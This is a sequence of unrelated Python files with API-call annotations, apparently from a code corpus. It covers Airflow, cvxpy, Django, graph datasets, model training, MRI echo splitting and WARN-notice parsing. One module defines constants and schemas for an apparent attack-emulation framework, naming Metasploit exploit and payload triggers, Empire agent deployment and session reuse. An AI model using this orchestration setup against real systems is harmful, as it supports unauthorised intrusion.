cv2.cv2.ROTATE_180)\n', (6264, 6297), False, 'import cv2\n'), ((6422, 6465), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6432, 6465), False, 'import cv2\n'), ((6603, 6646), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6613, 6646), False, 'import cv2\n'), ((6767, 6810), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6777, 6810), False, 'import cv2\n')]
|
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.bash_operator import BashOperator
from airflow.sensors.external_task_sensor import ExternalTaskSensor
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime(2020, 6, 7),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=1)
}
dag = DAG(
'dependent-dag',
default_args=default_args,
schedule_interval='*/5 * * * *',
catchup=False,
)
start = ExternalTaskSensor(
task_id='start-task',
external_dag_id='example-dag',
external_task_id='python-print',
execution_delta=timedelta(minutes=5),
timeout=3*60,
dag=dag,
)
curl = BashOperator(
bash_command=r"""curl -H "Content-Type: application/json" -d '{"status":"dependency successful", "time":"{{ ts }}"}' mock-server.default.svc.cluster.local""",
task_id="curl-task",
dag=dag,
)
curl.set_upstream(start)
|
[
"airflow.operators.bash_operator.BashOperator",
"datetime.timedelta",
"airflow.DAG",
"datetime.datetime"
] |
[((430, 530), 'airflow.DAG', 'DAG', (['"""dependent-dag"""'], {'default_args': 'default_args', 'schedule_interval': '"""*/5 * * * *"""', 'catchup': '(False)'}), "('dependent-dag', default_args=default_args, schedule_interval=\n '*/5 * * * *', catchup=False)\n", (433, 530), False, 'from airflow import DAG\n'), ((755, 963), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'bash_command': '"""curl -H "Content-Type: application/json" -d \'{"status":"dependency successful", "time":"{{ ts }}"}\' mock-server.default.svc.cluster.local"""', 'task_id': '"""curl-task"""', 'dag': 'dag'}), '(bash_command=\n \'curl -H "Content-Type: application/json" -d \\\'{"status":"dependency successful", "time":"{{ ts }}"}\\\' mock-server.default.svc.cluster.local\'\n , task_id=\'curl-task\', dag=dag)\n', (767, 963), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((281, 301), 'datetime.datetime', 'datetime', (['(2020)', '(6)', '(7)'], {}), '(2020, 6, 7)\n', (289, 301), False, 'from datetime import datetime, timedelta\n'), ((400, 420), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (409, 420), False, 'from datetime import datetime, timedelta\n'), ((692, 712), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (701, 712), False, 'from datetime import datetime, timedelta\n')]
|
"""
Minimizes D(b, Ax) for x ∈ ℝ₊^N where aₙ, b ∈ ℝ₊^M and D is a divergence.
These occur as ingredients of algorithms for the sparse case.
"""
import cvxpy
import numpy
def euclidean(A, b):
return _solve_convex(A, b, lambda p, q: cvxpy.norm2(p - q))
def total_variation(A, b):
return _solve_convex(A, b, lambda p, q: 0.5 * cvxpy.norm1(p - q))
def _solve_convex(A, b, D):
x = cvxpy.Variable(A.shape[1])
objective = cvxpy.Minimize(D(b, A @ x))
constraints = [x >= 0]
problem = cvxpy.Problem(objective, constraints)
problem.solve()
status = problem.status
assert status == cvxpy.OPTIMAL, f"Unable to solve optimization problem: {status}"
x = x.value
x[numpy.isclose(x, 0)] = 0
return x
|
[
"cvxpy.norm1",
"numpy.isclose",
"cvxpy.Problem",
"cvxpy.Variable",
"cvxpy.norm2"
] |
[((397, 423), 'cvxpy.Variable', 'cvxpy.Variable', (['A.shape[1]'], {}), '(A.shape[1])\n', (411, 423), False, 'import cvxpy\n'), ((509, 546), 'cvxpy.Problem', 'cvxpy.Problem', (['objective', 'constraints'], {}), '(objective, constraints)\n', (522, 546), False, 'import cvxpy\n'), ((706, 725), 'numpy.isclose', 'numpy.isclose', (['x', '(0)'], {}), '(x, 0)\n', (719, 725), False, 'import numpy\n'), ((240, 258), 'cvxpy.norm2', 'cvxpy.norm2', (['(p - q)'], {}), '(p - q)\n', (251, 258), False, 'import cvxpy\n'), ((339, 357), 'cvxpy.norm1', 'cvxpy.norm1', (['(p - q)'], {}), '(p - q)\n', (350, 357), False, 'import cvxpy\n')]
|
from django.urls import path
from api.authentication import CustomAuthToken
from api.views import (
ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView,
RegisterUserView, TransactionList)
urlpatterns = [
# Register
path('user/register/', RegisterUserView.as_view(), name="register-user"),
path('user/view-token/', CustomAuthToken.as_view(), name='token-view'),
# Transaction List
path('transactions/', TransactionList.as_view(), name='transaction-list'),
# API Key
path('user/apikeys/', ApiKeyView.as_view(), name='apikeys'),
path('user/apikeys/<int:key_id>/',
ApiKeyDetail.as_view(), name='apikey-detail'),
# Payment
path('payment/', PaymentView.as_view(), name='payment'),
path('payment/confirm/', PaymentConfirmationView.as_view(),
name='payment-confirm'),
]
|
[
"api.views.PaymentConfirmationView.as_view",
"api.views.RegisterUserView.as_view",
"api.authentication.CustomAuthToken.as_view",
"api.views.ApiKeyDetail.as_view",
"api.views.TransactionList.as_view",
"api.views.ApiKeyView.as_view",
"api.views.PaymentView.as_view"
] |
[((268, 294), 'api.views.RegisterUserView.as_view', 'RegisterUserView.as_view', ([], {}), '()\n', (292, 294), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((348, 373), 'api.authentication.CustomAuthToken.as_view', 'CustomAuthToken.as_view', ([], {}), '()\n', (371, 373), False, 'from api.authentication import CustomAuthToken\n'), ((445, 470), 'api.views.TransactionList.as_view', 'TransactionList.as_view', ([], {}), '()\n', (468, 470), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((539, 559), 'api.views.ApiKeyView.as_view', 'ApiKeyView.as_view', ([], {}), '()\n', (557, 559), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((626, 648), 'api.views.ApiKeyDetail.as_view', 'ApiKeyDetail.as_view', ([], {}), '()\n', (646, 648), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((709, 730), 'api.views.PaymentView.as_view', 'PaymentView.as_view', ([], {}), '()\n', (728, 730), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((778, 811), 'api.views.PaymentConfirmationView.as_view', 'PaymentConfirmationView.as_view', ([], {}), '()\n', (809, 811), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n')]
|
from datetime import datetime
from schema import Optional, Or
# Main queue constants
ACTION = "action"
CORRELATION_ID = "correlation_id"
DATA = "data"
RESULT_PIPE = "result_pipe"
QUEUE_NAME = "queue_name"
PROPERTIES = "properties"
HIGH_PRIORITY = 0
MEDIUM_PRIORITY = 1
LOW_PRIORITY = 2
# Processor action types
ACTION_KILL_TASK = "_kill_task"
ACTION_FINISH_TASK = "_finish_task"
ACTION_START_TRIGGER = "_start_trigger"
ACTION_STOP_TRIGGER = "_stop_trigger"
ACTION_LIST_TRIGGERS = "_list_triggers"
ACTION_SEND_MESSAGE = "_send_message"
ACTION_SHUTDOWN_THREADED_PROCESSOR = "shutdown_threaded_processor"
# Event types
EVENT_VALIDATE_MODULE = "VALIDATE_MODULE"
EVENT_LIST_MODULES = "LIST_MODULES"
EVENT_LIST_SESSIONS = "LIST_SESSIONS"
EVENT_KILL_STEP_EXECUTION = "KILL_STEP_EXECUTION"
EVENT_HEALTH_CHECK = "HEALTH_CHECK"
EVENT_START_TRIGGER = "START_TRIGGER"
EVENT_STOP_TRIGGER = "STOP_TRIGGER"
EVENT_TRIGGER_STAGE = "TRIGGER_STAGE"
EVENT_LIST_TRIGGERS = "LIST_TRIGGERS"
# Trigger types
HTTP = "HTTP"
MSF = "MSF"
# Trigger constants
TRIGGER_HOST = "host"
TRIGGER_PORT = "port"
TRIGGER_TYPE = "trigger_type"
TRIGGER_STAGE_EXECUTION_ID = "stage_execution_id"
TRIGGER_PARAMETERS = "parameters"
TRIGGER_ID = "trigger_id"
EXPLOIT = "exploit"
PAYLOAD = "payload"
EXPLOIT_ARGUMENTS = "exploit_arguments"
PAYLOAD_ARGUMENTS = "payload_arguments"
# Step types
STEP_TYPE = "step_type"
STEP_TYPE_EXECUTE_ON_WORKER = 'cryton/execute-on-worker'
STEP_TYPE_DEPLOY_AGENT = 'empire/deploy-agent'
STEP_TYPE_EXECUTE_ON_AGENT = 'empire/execute-on-agent'
# RabbitMQ message keywords
EVENT_T = "event_t"
EVENT_V = "event_v"
ARGUMENTS = "arguments"
DEFAULT_MSG_PROPERTIES = {"content_encoding": "utf-8", 'timestamp': datetime.now()}
TARGET_IP = "target_ip"
SESSION_LIST = "session_list"
MODULE_LIST = "module_list"
TRIGGER_LIST = "trigger_list"
ACK_QUEUE = "ack_queue"
# Step type execute-on-worker arguments keywords
ATTACK_MODULE = "attack_module"
ATTACK_MODULE_ARGUMENTS = "attack_module_args"
# Step type execute-on-agent arguments keywords
USE_AGENT = "use_agent"
EMPIRE_MODULE = "empire_module"
EMPIRE_MODULE_ARGUMENTS = "empire_module_args"
EMPIRE_SHELL_COMMAND = "shell_command"
# Step type deploy-agent arguments keywords
STAGER_ARGUMENTS = "stager_arguments"
STAGER_ARGS_STAGER_TYPE = "stager_type"
STAGER_ARGS_TARGET_OS_TYPE = "os_type"
STAGER_ARGS_LISTENER_TYPE = "listener_type"
STAGER_ARGS_LISTENER_NAME = "listener_name"
STAGER_ARGS_LISTENER_PORT = "listener_port"
STAGER_ARGS_AGENT_NAME = "agent_name"
STAGER_ARGS_STAGER_OPTIONS = "stager_options"
STAGER_ARGS_LISTENER_OPTIONS = "listener_options"
# Session system keywords
SESSION_ID = 'session_id'
CREATE_NAMED_SESSION = 'create_named_session'
USE_NAMED_SESSION = 'use_named_session'
USE_ANY_SESSION_TO_TARGET = 'use_any_session_to_target'
SSH_CONNECTION = 'ssh_connection'
# Other constants
RETURN_CODE = "return_code"
STD_ERR = "std_err"
STD_OUT = "std_out"
CODE_ERROR = -2
CODE_OK = 0
CODE_KILL = -3
FILE = "file"
FILE_CONTENT = "file_content"
FILE_ENCODING = "file_encoding"
BASE64 = "base64"
UTF8 = "utf8"
REPLY_TO = "reply_to"
# ControlTask validation schemas
EVENT_VALIDATE_MODULE_SCHEMA = {ATTACK_MODULE: str, ATTACK_MODULE_ARGUMENTS: dict}
EVENT_LIST_MODULES_SCHEMA = dict
EVENT_LIST_SESSIONS_SCHEMA = {Optional(Or("type", "tunnel_local", "tunnel_peer", "via_exploit", "via_payload", "desc",
"info", "workspace", "session_host", "session_port", "target_host",
"username", "uuid", "exploit_uuid", "routes", "arch")): Or(str, int)}
EVENT_KILL_STEP_EXECUTION_SCHEMA = {"correlation_id": str}
EVENT_HEALTH_CHECK_SCHEMA = {}
EVENT_START_TRIGGER_HTTP_SCHEMA = {"host": str, "port": int, "trigger_type": "HTTP", "reply_to": str, "routes": [
{"path": str, "method": str, "parameters": [{"name": str, "value": str}]}]}
EVENT_START_TRIGGER_MSF_SCHEMA = {"host": str, "port": int, "exploit": str,
Optional("exploit_arguments"): {Optional(str): Or(str, int)},
"payload": str, Optional("payload_arguments"): {Optional(str): Or(str, int)},
"trigger_type": "MSF", "reply_to": str}
EVENT_STOP_TRIGGER_SCHEMA = {"trigger_id": str}
EVENT_LIST_TRIGGERS_SCHEMA = {}
|
[
"schema.Optional",
"datetime.datetime.now",
"schema.Or"
] |
[((1698, 1712), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1710, 1712), False, 'from datetime import datetime\n'), ((3564, 3576), 'schema.Or', 'Or', (['str', 'int'], {}), '(str, int)\n', (3566, 3576), False, 'from schema import Optional, Or\n'), ((3972, 4001), 'schema.Optional', 'Optional', (['"""exploit_arguments"""'], {}), "('exploit_arguments')\n", (3980, 4001), False, 'from schema import Optional, Or\n'), ((4084, 4113), 'schema.Optional', 'Optional', (['"""payload_arguments"""'], {}), "('payload_arguments')\n", (4092, 4113), False, 'from schema import Optional, Or\n'), ((3276, 3485), 'schema.Or', 'Or', (['"""type"""', '"""tunnel_local"""', '"""tunnel_peer"""', '"""via_exploit"""', '"""via_payload"""', '"""desc"""', '"""info"""', '"""workspace"""', '"""session_host"""', '"""session_port"""', '"""target_host"""', '"""username"""', '"""uuid"""', '"""exploit_uuid"""', '"""routes"""', '"""arch"""'], {}), "('type', 'tunnel_local', 'tunnel_peer', 'via_exploit', 'via_payload',\n 'desc', 'info', 'workspace', 'session_host', 'session_port',\n 'target_host', 'username', 'uuid', 'exploit_uuid', 'routes', 'arch')\n", (3278, 3485), False, 'from schema import Optional, Or\n'), ((4004, 4017), 'schema.Optional', 'Optional', (['str'], {}), '(str)\n', (4012, 4017), False, 'from schema import Optional, Or\n'), ((4019, 4031), 'schema.Or', 'Or', (['str', 'int'], {}), '(str, int)\n', (4021, 4031), False, 'from schema import Optional, Or\n'), ((4116, 4129), 'schema.Optional', 'Optional', (['str'], {}), '(str)\n', (4124, 4129), False, 'from schema import Optional, Or\n'), ((4131, 4143), 'schema.Or', 'Or', (['str', 'int'], {}), '(str, int)\n', (4133, 4143), False, 'from schema import Optional, Or\n')]
|
import os.path as osp
import pickle as pkl
import torch
import random
import numpy as np
from torch_geometric.data import InMemoryDataset, Data
class SPMotif(InMemoryDataset):
splits = ['train', 'val', 'test']
def __init__(self, root, mode='train', transform=None, pre_transform=None, pre_filter=None):
assert mode in self.splits
self.mode = mode
super(SPMotif, self).__init__(root, transform, pre_transform, pre_filter)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(mode))
self.data, self.slices = torch.load(self.processed_paths[idx])
@property
def raw_file_names(self):
return ['train.npy', 'val.npy', 'test.npy']
@property
def processed_file_names(self):
return ['SPMotif_train.pt', 'SPMotif_val.pt', 'SPMotif_test.pt']
def download(self):
if not osp.exists(osp.join(self.raw_dir, 'raw', 'SPMotif_train.npy')):
print("raw data of `SPMotif` doesn't exist, please redownload from our github.")
raise FileNotFoundError
def process(self):
idx = self.raw_file_names.index('{}.npy'.format(self.mode))
edge_index_list, label_list, ground_truth_list, role_id_list, pos = np.load(osp.join(self.raw_dir, self.raw_file_names[idx]), allow_pickle=True)
data_list = []
for idx, (edge_index, y, ground_truth, z, p) in enumerate(zip(edge_index_list, label_list, ground_truth_list, role_id_list, pos)):
edge_index = torch.from_numpy(edge_index)
edge_index = torch.tensor(edge_index, dtype=torch.long)
node_idx = torch.unique(edge_index)
assert node_idx.max() == node_idx.size(0) - 1
x = torch.zeros(node_idx.size(0), 4)
index = [i for i in range(node_idx.size(0))]
x[index, z] = 1
x = torch.rand((node_idx.size(0), 4))
edge_attr = torch.ones(edge_index.size(1), 1)
y = torch.tensor(y, dtype=torch.long).unsqueeze(dim=0)
data = Data(x=x, y=y, z=z,
edge_index=edge_index,
edge_attr=edge_attr,
pos=p,
edge_gt_att=torch.LongTensor(ground_truth),
name=f'SPMotif-{self.mode}-{idx}', idx=idx)
if self.pre_filter is not None and not self.pre_filter(data):
continue
if self.pre_transform is not None:
data = self.pre_transform(data)
data_list.append(data)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(self.mode))
print(self.processed_paths[idx])
print(len(data_list))
torch.save(self.collate(data_list), self.processed_paths[idx])
|
[
"torch.unique",
"torch.LongTensor",
"torch.load",
"os.path.join",
"torch.tensor",
"torch.from_numpy"
] |
[((568, 605), 'torch.load', 'torch.load', (['self.processed_paths[idx]'], {}), '(self.processed_paths[idx])\n', (578, 605), False, 'import torch\n'), ((1245, 1293), 'os.path.join', 'osp.join', (['self.raw_dir', 'self.raw_file_names[idx]'], {}), '(self.raw_dir, self.raw_file_names[idx])\n', (1253, 1293), True, 'import os.path as osp\n'), ((1501, 1529), 'torch.from_numpy', 'torch.from_numpy', (['edge_index'], {}), '(edge_index)\n', (1517, 1529), False, 'import torch\n'), ((1555, 1597), 'torch.tensor', 'torch.tensor', (['edge_index'], {'dtype': 'torch.long'}), '(edge_index, dtype=torch.long)\n', (1567, 1597), False, 'import torch\n'), ((1621, 1645), 'torch.unique', 'torch.unique', (['edge_index'], {}), '(edge_index)\n', (1633, 1645), False, 'import torch\n'), ((878, 928), 'os.path.join', 'osp.join', (['self.raw_dir', '"""raw"""', '"""SPMotif_train.npy"""'], {}), "(self.raw_dir, 'raw', 'SPMotif_train.npy')\n", (886, 928), True, 'import os.path as osp\n'), ((1962, 1995), 'torch.tensor', 'torch.tensor', (['y'], {'dtype': 'torch.long'}), '(y, dtype=torch.long)\n', (1974, 1995), False, 'import torch\n'), ((2211, 2241), 'torch.LongTensor', 'torch.LongTensor', (['ground_truth'], {}), '(ground_truth)\n', (2227, 2241), False, 'import torch\n')]
|
import logging
import hydra
import torch
from model import MyAwesomeModel
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from torch.utils.data import DataLoader
from src.data.mnist import CorruptedMNIST
log = logging.getLogger(__name__)
@hydra.main(config_path="configs", config_name="mnist_config.yaml")
def train(cfg):
print("Training day and night")
model = MyAwesomeModel(cfg.model)
train_loader = DataLoader(
CorruptedMNIST(cfg.training.train_set), batch_size=cfg.training.batch_size
)
validation_loader = DataLoader(
CorruptedMNIST(cfg.training.valid_set), batch_size=cfg.training.batch_size
)
early_stopping_callback = EarlyStopping(
monitor="valid_loss", patience=3, verbose=True, mode="min"
)
trainer = Trainer(
max_epochs=cfg.training.epochs,
accelerator="gpu",
gpus=1,
limit_train_batches=cfg.training.limit_train_batches,
callbacks=[early_stopping_callback],
)
trainer.fit(
model, train_dataloaders=train_loader, val_dataloaders=validation_loader
)
# Save model
torch.save(model.state_dict(), cfg.training.model_path)
script_model = torch.jit.script(model)
script_model.save('deployable_model.pt')
train()
|
[
"pytorch_lightning.Trainer",
"model.MyAwesomeModel",
"torch.jit.script",
"src.data.mnist.CorruptedMNIST",
"hydra.main",
"pytorch_lightning.callbacks.early_stopping.EarlyStopping",
"logging.getLogger"
] |
[((283, 310), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (300, 310), False, 'import logging\n'), ((317, 383), 'hydra.main', 'hydra.main', ([], {'config_path': '"""configs"""', 'config_name': '"""mnist_config.yaml"""'}), "(config_path='configs', config_name='mnist_config.yaml')\n", (327, 383), False, 'import hydra\n'), ((451, 476), 'model.MyAwesomeModel', 'MyAwesomeModel', (['cfg.model'], {}), '(cfg.model)\n', (465, 476), False, 'from model import MyAwesomeModel\n'), ((763, 836), 'pytorch_lightning.callbacks.early_stopping.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""valid_loss"""', 'patience': '(3)', 'verbose': '(True)', 'mode': '"""min"""'}), "(monitor='valid_loss', patience=3, verbose=True, mode='min')\n", (776, 836), False, 'from pytorch_lightning.callbacks.early_stopping import EarlyStopping\n'), ((868, 1034), 'pytorch_lightning.Trainer', 'Trainer', ([], {'max_epochs': 'cfg.training.epochs', 'accelerator': '"""gpu"""', 'gpus': '(1)', 'limit_train_batches': 'cfg.training.limit_train_batches', 'callbacks': '[early_stopping_callback]'}), "(max_epochs=cfg.training.epochs, accelerator='gpu', gpus=1,\n limit_train_batches=cfg.training.limit_train_batches, callbacks=[\n early_stopping_callback])\n", (875, 1034), False, 'from pytorch_lightning import Trainer\n'), ((1289, 1312), 'torch.jit.script', 'torch.jit.script', (['model'], {}), '(model)\n', (1305, 1312), False, 'import torch\n'), ((520, 558), 'src.data.mnist.CorruptedMNIST', 'CorruptedMNIST', (['cfg.training.train_set'], {}), '(cfg.training.train_set)\n', (534, 558), False, 'from src.data.mnist import CorruptedMNIST\n'), ((648, 686), 'src.data.mnist.CorruptedMNIST', 'CorruptedMNIST', (['cfg.training.valid_set'], {}), '(cfg.training.valid_set)\n', (662, 686), False, 'from src.data.mnist import CorruptedMNIST\n')]
|
"""Split each echo to prepare for registration."""
import os
import subprocess
import numpy as np
import nibabel as nb
# =============================================================================
NII_NAMES = [
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-01_dir-AP_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-02_dir-RL_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-03_dir-PA_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-04_dir-LR_part-mag_MEGRE_crop.nii.gz',
]
OUTDIR = "/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/05_split_echoes"
# =============================================================================
print("Step_05: Split echoes.")
# Output directory
if not os.path.exists(OUTDIR):
os.makedirs(OUTDIR)
print(" Output directory: {}".format(OUTDIR))
# Average across echoes
for i, nii_name in enumerate(NII_NAMES):
# Load data
nii = nb.load(nii_name)
temp = np.squeeze(np.asanyarray(nii.dataobj))
# Save each echo separately
basename, ext = nii.get_filename().split(os.extsep, 1)
basename = os.path.basename(basename)
out_name = os.path.join(OUTDIR, basename)
for j in range(temp.shape[-1]):
echo = np.squeeze(temp[..., j])
img = nb.Nifti1Image(echo, affine=nii.affine, header=nii.header)
nb.save(img, '{}_echo{}.nii.gz'.format(out_name, j+1))
print(' Finished.')
|
[
"nibabel.Nifti1Image",
"os.makedirs",
"nibabel.load",
"os.path.basename",
"numpy.asanyarray",
"os.path.exists",
"numpy.squeeze",
"os.path.join"
] |
[((928, 950), 'os.path.exists', 'os.path.exists', (['OUTDIR'], {}), '(OUTDIR)\n', (942, 950), False, 'import os\n'), ((956, 975), 'os.makedirs', 'os.makedirs', (['OUTDIR'], {}), '(OUTDIR)\n', (967, 975), False, 'import os\n'), ((1115, 1132), 'nibabel.load', 'nb.load', (['nii_name'], {}), '(nii_name)\n', (1122, 1132), True, 'import nibabel as nb\n'), ((1290, 1316), 'os.path.basename', 'os.path.basename', (['basename'], {}), '(basename)\n', (1306, 1316), False, 'import os\n'), ((1332, 1362), 'os.path.join', 'os.path.join', (['OUTDIR', 'basename'], {}), '(OUTDIR, basename)\n', (1344, 1362), False, 'import os\n'), ((1155, 1181), 'numpy.asanyarray', 'np.asanyarray', (['nii.dataobj'], {}), '(nii.dataobj)\n', (1168, 1181), True, 'import numpy as np\n'), ((1414, 1438), 'numpy.squeeze', 'np.squeeze', (['temp[..., j]'], {}), '(temp[..., j])\n', (1424, 1438), True, 'import numpy as np\n'), ((1453, 1511), 'nibabel.Nifti1Image', 'nb.Nifti1Image', (['echo'], {'affine': 'nii.affine', 'header': 'nii.header'}), '(echo, affine=nii.affine, header=nii.header)\n', (1467, 1511), True, 'import nibabel as nb\n')]
|
import typing
from datetime import datetime
from ..schema import BaseTransformer
class Transformer(BaseTransformer):
"""Transform Indiana raw data for consolidation."""
postal_code = "IN"
fields = dict(
company="Company",
location="City",
notice_date="Notice Date",
effective_date="LO/CL Date",
jobs="Affected Workers",
)
date_format = ["%m/%d/%Y", "%m/%d/%y", "%B %Y", "%Y", "%b %Y", "%m/%Y"]
jobs_corrections = {
"97 (in MI)0 (in IN)": 0,
"100+": 100,
"62 MAY be affected": 62,
"5 in Indiana": 5,
"Unknown": None,
"75 in Indiana": 75,
"40-50": 40,
"100-130": 100,
"4 Hoosiers": 4,
"Undisclosed at this time": None,
"500 Nationwide": None,
"NA": None,
"103 (REVISED) 10/22/2020 108": 103,
}
date_corrections = {
"01/30/1202": datetime(2012, 1, 30),
"April/June 2020": datetime(2020, 4, 1),
"Unknown": None,
"Q1 2019": datetime(2019, 1, 1),
"Q1 2018": datetime(2018, 1, 1),
"Sept. 2016": datetime(2016, 9, 1),
"No closure date announced. Layoffs to commence 05/27/2015": datetime(
2015, 5, 27
),
"TBD": None,
"09/22/2014-12/07/2014": datetime(2014, 9, 22),
"08/18/2014-12/31/2014": datetime(2014, 8, 18),
"End of 2013": datetime(2013, 12, 31),
"Mid-Year 2014": datetime(2014, 6, 15),
"02/29/2013": datetime(2013, 2, 28),
"year end 2014": datetime(2014, 12, 31),
"4th Qtr 2012": datetime(2012, 9, 1),
"Mid February 2012": datetime(2012, 2, 14),
"3rd Qtr 2012": datetime(2012, 6, 1),
"LO-01/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"Prior to the end of 2009 (as stated in the WARN notice)": datetime(
2009, 12, 31
),
"No closure date announced. Layoffs": None,
"1st Quarter 2009": datetime(2009, 1, 1),
"02/02/2009\xa0to\xa0\xa012/30/2009": datetime(2009, 2, 2),
"3rd Quarter of 2009": datetime(2009, 6, 1),
"August to December 2008": datetime(2008, 8, 1),
"10/37/2008": datetime(2008, 10, 27),
"2/29/2013": datetime(2013, 2, 28),
"LO-1/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"3rd quarter of 2009": datetime(2009, 6, 1),
}
def prep_row_list(
self, row_list: typing.List[typing.Dict]
) -> typing.List[typing.Dict]:
"""Make necessary transformations to the raw row list prior to transformation.
Args:
row_list (list): A list of raw rows of data from the source.
Returns: The row list minus empty records
"""
# Do the standard stuff
row_list = super().prep_row_list(row_list)
# Cut rows with data-free revisions
return [r for r in row_list if r["Affected Workers"] != "N/A"]
def transform_date(self, value: str) -> typing.Optional[str]:
"""Transform a raw date string into a date object.
Args:
value (str): The raw date string provided by the source
Returns: A date object ready for consolidation. Or, if the date string is invalid, a None.
"""
# Try corrections before we edit the string
try:
dt = self.date_corrections[value]
if dt:
return str(dt.date())
else:
assert dt is None
return dt
except KeyError:
pass
# A little custom clean up based on the weird stuff from this source
value = value.replace("starting", "")
value = value.strip().split(" and ")[0].strip()
value = value.strip().split(" to ")[0].strip()
value = value.strip().split(" through ")[0].strip()
value = value.strip().split(" - ")[0].strip()
value = value.strip().split(" & ")[0].strip()
value = value.strip().split("\xa0to ")[0].strip()
value = value.strip().split(" – ")[0].strip()
value = value.strip().split("-")[0].strip()
# The same old stuff
return super().transform_date(value)
def check_if_closure(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a closure or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
whitelist = ["CL", "CL -Relocating", "LO and CL", "LO/CL", "PENDING CL"]
return row["Notice Type"] in whitelist or None
|
[
"datetime.datetime"
] |
[((915, 936), 'datetime.datetime', 'datetime', (['(2012)', '(1)', '(30)'], {}), '(2012, 1, 30)\n', (923, 936), False, 'from datetime import datetime\n'), ((965, 985), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(1)'], {}), '(2020, 4, 1)\n', (973, 985), False, 'from datetime import datetime\n'), ((1031, 1051), 'datetime.datetime', 'datetime', (['(2019)', '(1)', '(1)'], {}), '(2019, 1, 1)\n', (1039, 1051), False, 'from datetime import datetime\n'), ((1072, 1092), 'datetime.datetime', 'datetime', (['(2018)', '(1)', '(1)'], {}), '(2018, 1, 1)\n', (1080, 1092), False, 'from datetime import datetime\n'), ((1116, 1136), 'datetime.datetime', 'datetime', (['(2016)', '(9)', '(1)'], {}), '(2016, 9, 1)\n', (1124, 1136), False, 'from datetime import datetime\n'), ((1207, 1228), 'datetime.datetime', 'datetime', (['(2015)', '(5)', '(27)'], {}), '(2015, 5, 27)\n', (1215, 1228), False, 'from datetime import datetime\n'), ((1306, 1327), 'datetime.datetime', 'datetime', (['(2014)', '(9)', '(22)'], {}), '(2014, 9, 22)\n', (1314, 1327), False, 'from datetime import datetime\n'), ((1362, 1383), 'datetime.datetime', 'datetime', (['(2014)', '(8)', '(18)'], {}), '(2014, 8, 18)\n', (1370, 1383), False, 'from datetime import datetime\n'), ((1408, 1430), 'datetime.datetime', 'datetime', (['(2013)', '(12)', '(31)'], {}), '(2013, 12, 31)\n', (1416, 1430), False, 'from datetime import datetime\n'), ((1457, 1478), 'datetime.datetime', 'datetime', (['(2014)', '(6)', '(15)'], {}), '(2014, 6, 15)\n', (1465, 1478), False, 'from datetime import datetime\n'), ((1502, 1523), 'datetime.datetime', 'datetime', (['(2013)', '(2)', '(28)'], {}), '(2013, 2, 28)\n', (1510, 1523), False, 'from datetime import datetime\n'), ((1550, 1572), 'datetime.datetime', 'datetime', (['(2014)', '(12)', '(31)'], {}), '(2014, 12, 31)\n', (1558, 1572), False, 'from datetime import datetime\n'), ((1598, 1618), 'datetime.datetime', 'datetime', (['(2012)', '(9)', '(1)'], {}), '(2012, 9, 1)\n', (1606, 1618), False, 'from datetime import datetime\n'), ((1649, 1670), 'datetime.datetime', 'datetime', (['(2012)', '(2)', '(14)'], {}), '(2012, 2, 14)\n', (1657, 1670), False, 'from datetime import datetime\n'), ((1696, 1716), 'datetime.datetime', 'datetime', (['(2012)', '(6)', '(1)'], {}), '(2012, 6, 1)\n', (1704, 1716), False, 'from datetime import datetime\n'), ((1758, 1779), 'datetime.datetime', 'datetime', (['(2011)', '(1)', '(14)'], {}), '(2011, 1, 14)\n', (1766, 1779), False, 'from datetime import datetime\n'), ((1848, 1870), 'datetime.datetime', 'datetime', (['(2009)', '(12)', '(31)'], {}), '(2009, 12, 31)\n', (1856, 1870), False, 'from datetime import datetime\n'), ((1974, 1994), 